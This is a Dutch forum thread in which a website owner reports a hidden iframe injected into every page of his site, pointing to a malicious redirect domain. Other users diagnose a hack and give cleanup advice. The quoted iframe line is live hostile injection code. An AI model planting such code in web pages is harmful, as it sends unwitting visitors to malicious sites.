eerder topic   volgend topic
  
Zeer raar site-probleem
3 oktober 2007 - 17:14   
geplaatst door: Ben271185
Ik zit met een vreemd probleem op mijn website. Ik wil vandaag aan een paar pagina's aanpassingen doen, maar nu blijkt dat helemaal onderaan mijn pagina deze tekst staat :
Code: [Selecteer]
<iframe src='http://1941revenge.org/redirect1.php' style='display:none'></iframe>
Vraag 1 : Waar komt dat in hemelsnaam vandaan? Het staat niet in 1 HTML-pagina maar in allemaal.
Vraag 2 : Surf ik naar die link, dan valt Safari weg, surf ik alleen naar het eerste deel dan kom ik wel op een zeer rare pagina uit.

Het tweede punt, ik kan geen aanpassingen meer doen aan mijn website. Niet meer via Transmit. Dan krijg ik deze waarschuwing :

Code: [Selecteer]
Server zei:
***.html: Permission denied

Fout: -160: could not start data transfer

Probeer ik het via DirectAdmin dan krijg ik deze fout :

Code: [Selecteer]
Unable to save your changes

Heeft er iemand een idee wat er gebeurt zou kunnen zijn met mijn website?

Edit : de website is www.bendevannijvel.com

(Bewerkt door Ben271185 om 17:15, 3-10-2007)

www.bendevannijvel.com » Gemaakt op een iMac G5 "20
Zeer raar site-probleem
3 oktober 2007 - 17:36    reactie #1
geplaatst door: Didjee
Wellicht is je site gehackt? Even contact opnemen met je provider lijkt me. Zij kunnen zó zien wat er met je account aan de hand is.
Zeer raar site-probleem
4 oktober 2007 - 16:38    reactie #2
geplaatst door: macossie
Resultaten google circa 33.600 voor "exploit directadmin" :confused:

denk dat je er van uit kan gaan dat je gehackt bent :thumbs-down:

Zeer raar site-probleem
4 oktober 2007 - 16:47    reactie #3
geplaatst door: moi
Ga hier maar s kijken:

http://www.1941revenge.org

en

http://www.revenge.org


Je bent dus gehackt!

Je host moet dit in orde maken

m o r e o r l e s s r u l e s
Zeer raar site-probleem
4 oktober 2007 - 17:36    reactie #4
geplaatst door: Ben271185
Mijn hosting is er op dit moment mee bezig. Maar wat ik me nog afvroeg :
- Heeft het nut om klacht neer te leggen? Het staat duidelijk op mijn website dat het verboden is om toegang te verschaffen tot delen die niet publiekelijk online zijn geplaatst.
- Kan mijn host kijken wie er achter de hack zit en waar het vandaan kwam?

(Bewerkt door Ben271185 om 17:59, 4-10-2007)

www.bendevannijvel.com » Gemaakt op een iMac G5 "20
Zeer raar site-probleem
4 oktober 2007 - 17:44    reactie #5
geplaatst door: moi
de host kan de url blokkeren.
m o r e o r l e s s r u l e s
Zeer raar site-probleem
5 oktober 2007 - 10:01    reactie #6
geplaatst door: Cailin Coilleach
Citaat
de host kan de url blokkeren.

Whut? o_O

@Ben:
Ja, mogelijk dat je hosting provider kan achterhalen wie je boeltje heeft gehacked. De webservers houden als het goed is gewoon IP adressen bij van mensen die pagina's opvragen. Als je ze laat checken op sessies naar jou admin pagina's, dan kom je al een heel eind.

Zij zullen wel vaker met dit bijltje hebben gehakt.

Zeer raar site-probleem
5 oktober 2007 - 17:58    reactie #7
geplaatst door: Ben271185
Omdat ik nog steeds geen reactie heb gekregen van mijn hosting (behalve 'we zullen er eens naar kijken') heb ik zelf een poging ondernomen om de hacker/hackster te slim af te zijn. Ik heb mijn wachtwoord van mijn website aangepast. Nu lukt het me terug om aanpassing te doen en .html-bestanden te bewaren.
Ik kan dus zelf de tekst tussen de IFRAME verwijderen.

Nu vroeg ik me af of het nuttig is om op alle pagina's van mijn site die IFRAME te verwijderen? Of kan ik beter wachten tot mijn hosting met een langdurige oplossing komt.

www.bendevannijvel.com » Gemaakt op een iMac G5 "20
Zeer raar site-probleem
5 oktober 2007 - 18:47    reactie #8
geplaatst door: Administrator
aub de CODE tag gebruiken, anders loopt draadje vast.
MacFreak Admin
- MacBook Pro 15inch
Zeer raar site-probleem
5 oktober 2007 - 20:08    reactie #9
geplaatst door: Cailin Coilleach
Dat "DirectAdmin" is dat een beheerpakketje van je hosting provider? Waar wordt het precies voor gebruikt?

Wat te doen:
1. Maak een backup van je huidige site files die je lokaal hebt staan.
2. Maak een backup van de site zoals hij nu bij de hosting provider staat.
3. Haal heel je webspace leeg. Helemaal.
4. Zet de bij 1 gemaakte backup op je webspace terug. Als je werk verliest is dat jammer, maar doe het op deze manier. Ga geen files gebruiken uit de kopie op de server.
5. Pas al je passwords aan die met je site te maken hebben.

Als je een database backend gebruikt, doe dan dezelfde stappen ook daar voor.

Je maakt toch wel regelmatig backups? ;)

Zeer raar site-probleem
6 oktober 2007 - 11:47    reactie #10
geplaatst door: macossie

Citaat
Cailin Coilleach om 20:08, 5-10-2007
Dat "DirectAdmin" is dat een beheerpakketje van je hosting provider? Waar wordt het precies voor gebruikt?

je kan het hier zelf bekijken: DirectAdmin Login Page
Login: demo_user - Password : demo

Zeer raar site-probleem
6 oktober 2007 - 12:35    reactie #11
geplaatst door: Cailin Coilleach
Ah, okay... Een control panel voor virtual hosting dus.

In dat geval ook al je instellingen bij Direct Admin nalopen en kijken of ze daar geen vervelende veranderingen hebben doorgevoerd. Controleer echt alles.

En kijk eens of je webhost toevallig het gebruik van HTTPS toestaat voor die control panel. Dan kan je wachtwoord in elk geval niet meer worden afgeluisterd :)

  
eerder topic   volgend topic